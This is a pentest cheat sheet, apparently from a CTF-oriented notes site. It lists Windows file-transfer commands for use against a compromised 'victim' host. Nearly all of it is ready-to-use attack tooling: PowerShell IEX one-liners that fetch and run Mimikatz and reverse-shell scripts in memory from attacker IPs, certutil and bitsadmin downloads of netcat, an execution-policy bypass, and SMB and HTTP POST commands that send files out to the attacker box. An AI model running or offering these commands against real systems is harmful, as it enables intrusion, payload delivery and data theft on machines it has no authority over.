1 minute read

Fast Windows Commands

Command Description
Invoke-WebRequest https:///PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell
IEX (New-Object Net.WebClient).DownloadString(‘https:///Invoke-Mimikatz.ps1') Execute a file in memory using PowerShell
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64 Upload a file with PowerShell
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe Download a file using Certutil
scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip Upload a file using SCP
scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe Download a file using SCP
Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile “nc.exe” Invoke-WebRequest using a Chrome User Agent

Certutils

certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

IWR (Invoke Web Request)

powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe "

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

IEX

Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias iex.

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')

IEX also accepts pipeline input.

powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex

Internet Explorer Basic Parsing

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

Escaping shell

If you ever encounter error regarding slash while supplying any of above command Incorrect syntax near ‘/’. Use / to escape it -

powershell.exe IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\")

Script

  • if above command get blocked we can make ps script that will download our file
  • run following commands in victim :
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[http://ATTACKER_IP/nc.exe"](http://ATTACKER_IP/nc.exe) >> wget.ps1
echo $file = "nc.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

Execution of script

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

SMB

Attacker -

smbserver.py gabbar /tmp

Target -

dir \\Attacker_ip\gabbar
# will list out all files

copy \\10.10.14.109\gabbar\winPEASx86.exe .
# To download from our machine

copy user.txt \\10.10.14.109\gabbar
# To upload file to our box

You May Also Enjoy

Linux

less than 1 minute read